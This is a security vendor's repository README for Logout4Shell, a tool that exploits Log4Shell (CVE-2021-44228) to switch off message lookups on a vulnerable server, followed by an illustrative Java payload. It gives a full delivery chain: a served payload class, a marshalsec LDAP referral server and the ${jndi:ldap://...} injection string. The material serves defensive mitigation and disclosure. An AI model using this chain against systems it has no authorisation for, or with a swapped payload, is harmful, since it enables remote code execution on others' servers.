https://github.com/Cybereason/Logout4Shell

Cybereason / Logout4Shell (public repository): "Use Log4Shell vulnerability to vaccinate a victim server against Log4Shell". 225 stars, 17 forks, 15 commits, 1 branch (main), 0 tags. Latest commit ddf83d3 (Dec 11, 2021): Merge pull request #2 from Firesphere/patch-1, "Addressing issue #1".
Repository layout: `assets/` (logo, Dec 10, 2021), `src/main/java/` (initial commit, Dec 10, 2021), `.gitignore` (Dec 10, 2021), `README.md` ("Addressing issue #1", Dec 11, 2021), `pom.xml` ("Adding explicit java version", Dec 11, 2021).

# Logout4Shell

## Description

A vulnerability impacting Apache Log4j 2 versions 2.0 through 2.14.1 was disclosed on the project's GitHub on December 9, 2021. The flaw has been dubbed "Log4Shell" and carries the highest possible CVSS severity rating of 10.0. Software made or managed by the Apache Software Foundation (from here on just "Apache") is pervasive; the Apache HTTP Server alone runs close to a third of the world's web servers, and Log4j 2 is embedded in a vast number of Java applications and appliances, which makes this a potentially catastrophic flaw.

The Log4Shell vulnerability, CVE-2021-44228, was published on December 9, 2021 and allows unauthenticated remote code execution on vulnerable servers: a logged message containing a lookup such as `${jndi:ldap://attacker/a}` is expanded by the logger, which fetches and instantiates a class from the attacker-controlled server.

While the best mitigation is to upgrade Log4j to 2.15.0 or later, in Log4j 2.10 and above the behaviour can also be mitigated by setting the system property `log4j2.formatMsgNoLookups` to `true` (or the environment variable `LOG4J_FORMAT_MSG_NO_LOOKUPS=true`), and in any 2.x version by removing the `JndiLookup` class from the classpath. Additionally, on Java runtimes 8u121 and later the properties `com.sun.jndi.rmi.object.trustURLCodebase` and `com.sun.jndi.cosnaming.object.trustURLCodebase` default to `false`, which blocks remote class loading over RMI and CORBA; the LDAP equivalent, `com.sun.jndi.ldap.object.trustURLCodebase`, only defaulted to `false` in 8u191, and even then the lookup can still be abused through deserialization gadgets already present on the classpath, so the JVM version alone is not a complete defence. Setting these system properties, however, requires access to the vulnerable server as well as an application restart.

The Cybereason research team has developed the following code, which exploits the same vulnerability; its payload forces the logger to reconfigure itself with the vulnerable setting disabled, effectively blocking any further attempt to exploit Log4Shell on that server. You can learn more here.

## How it works

The payload and exploit in this repository use the Java runtime to reconfigure the logger.
Prior to reconfiguring, the global setting `FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS` (a static field of `org.apache.logging.log4j.core.util.Constants`, populated from `log4j2.formatMsgNoLookups` when that class is first loaded) is set to `true`, disabling message-format lookups. The pattern layout copies that flag into its message converter when a configuration is built, so the reconfiguration step is what makes the change take effect for the running logger and prevents further exploitation of this attack.

## How to use

1. Download this repository and build it
   - 1.1 `git clone https://github.com/Cybereason/Logout4Shell.git`
   - 1.2 build it: `mvn package`
   - 1.3 `cd target/classes`
   - 1.4 run the web server that will serve the compiled payload class: `python3 -m http.server 8888`
2. Download, build and run marshalsec's LDAP server
   - 2.1 `git clone https://github.com/mbechler/marshalsec.git`
   - 2.2 `mvn package -DskipTests`
   - 2.3 `java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://<server-ip>:8888/#Log4jRCE"` (the LDAP server listens on port 1389 by default; `<server-ip>` is the address of the host running the web server from step 1.4, and it must be reachable from the victim)
3. To immunize a server
   - 3.1 enter `${jndi:ldap://<server-ip>:1389/a}` into a vulnerable field (such as a user name)

The delivery path is the same remote class loading an attacker would use, so it only works where that path is open (for example a Java runtime older than 8u191, or `com.sun.jndi.ldap.object.trustURLCodebase` explicitly set to `true`). A server that blocks remote codebases cannot be immunized this way, and every server still needs a patched Log4j once it can be restarted.

## DISCLAIMER

The code described in this advisory (the "Code") is provided on an "as is" and "as available" basis and may contain bugs, errors and other defects. You are advised to safeguard important data and to use caution. By using this Code, you agree that Cybereason shall have no liability to you for any claims in connection with the Code. Cybereason disclaims any liability for any direct, indirect, incidental, punitive, exemplary, special or consequential damages, even if Cybereason or its related parties are advised of the possibility of such damages. Cybereason undertakes no duty to update the Code or this advisory.

## Credits

The initial repo and inspiration for this work is based on the work of tangxiaofeng7/apache-log4j-poc.

Contributors: cr-mitmit, Maayan-Sela (cr-maayansela), Simon Erkelens (Firesphere), Cybereason. Language: Java (100%). No releases or packages published.
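The reconfiguration described under "How it works", and the effect the "How to use" procedure produces on the victim, as an added illustrative example. This is my own code, not the repository's `Log4jRCE` class; the class name `Vaccinate` is an assumption. It assumes log4j-core 2.10 to 2.14.1 on the classpath (the releases that have `Constants.FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS`) and a Java 8 or 11 runtime, because it clears the `final` modifier through the `Field.modifiers` reflection trick that JDK 12 and later no longer allow.

```java
import java.lang.reflect.Field;
import java.lang.reflect.Modifier;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.core.LoggerContext;

/**
 * Illustrative "vaccine" payload (not the project's Log4jRCE class).
 * When the JDK resolves a JNDI reference whose factory class comes from a
 * remote codebase, it instantiates that class through its no-arg
 * constructor, so the constructor is where the work happens.
 */
public class Vaccinate {

    public Vaccinate() {
        try {
            disableMessageLookups();
        } catch (Throwable t) {
            // Never let the payload take down the thread that logged the message.
            t.printStackTrace();
        }
    }

    public static void disableMessageLookups() throws Exception {
        // 1. Any LoggerContext created from now on reads this property and starts out safe.
        System.setProperty("log4j2.formatMsgNoLookups", "true");

        // 2. The running context already read the property (as false) when Constants
        //    was initialised, so patch the cached flag in place. The field is not a
        //    compile-time constant (it is initialised from a method call), so callers
        //    read the patched value rather than an inlined copy.
        Class<?> constants = Class.forName("org.apache.logging.log4j.core.util.Constants");
        Field flag = constants.getField("FORMAT_MESSAGES_PATTERN_DISABLE_LOOKUPS");
        setStaticFinal(flag, Boolean.TRUE);

        // 3. MessagePatternConverter copies the flag into each layout when a
        //    configuration is built, so rebuild the live configuration.
        LoggerContext ctx = LoggerContext.getContext(false);
        ctx.reconfigure();
    }

    /**
     * Clear FINAL on the Field's own modifiers, then assign. Java 8 accepts this
     * silently and Java 11 with a warning; JDK 12+ hides Field.modifiers from
     * reflection, so a different approach is needed there.
     */
    static void setStaticFinal(Field field, Object value) throws Exception {
        field.setAccessible(true);
        Field modifiers = Field.class.getDeclaredField("modifiers");
        modifiers.setAccessible(true);
        modifiers.setInt(field, field.getModifiers() & ~Modifier.FINAL);
        field.set(null, value); // primitive boolean field: the Boolean is unboxed
    }

    /**
     * Local check against log4j-core 2.14.1 with no log4j2 configuration file
     * (default config: ERROR level to the console, pattern ending in %msg%n).
     */
    public static void main(String[] args) {
        Logger log = LogManager.getLogger(Vaccinate.class);
        // Before: the default %msg converter still resolves ${...} lookups.
        log.error("before: ${java:version}");
        new Vaccinate(); // what the LDAP-delivered payload does on the victim
        // After: the same string goes through the rebuilt configuration untouched.
        log.error("after: ${java:version}");
    }
}
```

To try it locally, compile against log4j-core 2.14.1 and run `main` with nothing setting `log4j2.formatMsgNoLookups` beforehand; verify that the first console line has the Java version substituted into the message and the second line contains the literal text `${java:version}`. That difference is the whole effect of the vaccine: nothing is patched on disk, only the in-memory flag and configuration change, so the protection lasts until the JVM restarts and the server still needs a fixed Log4j.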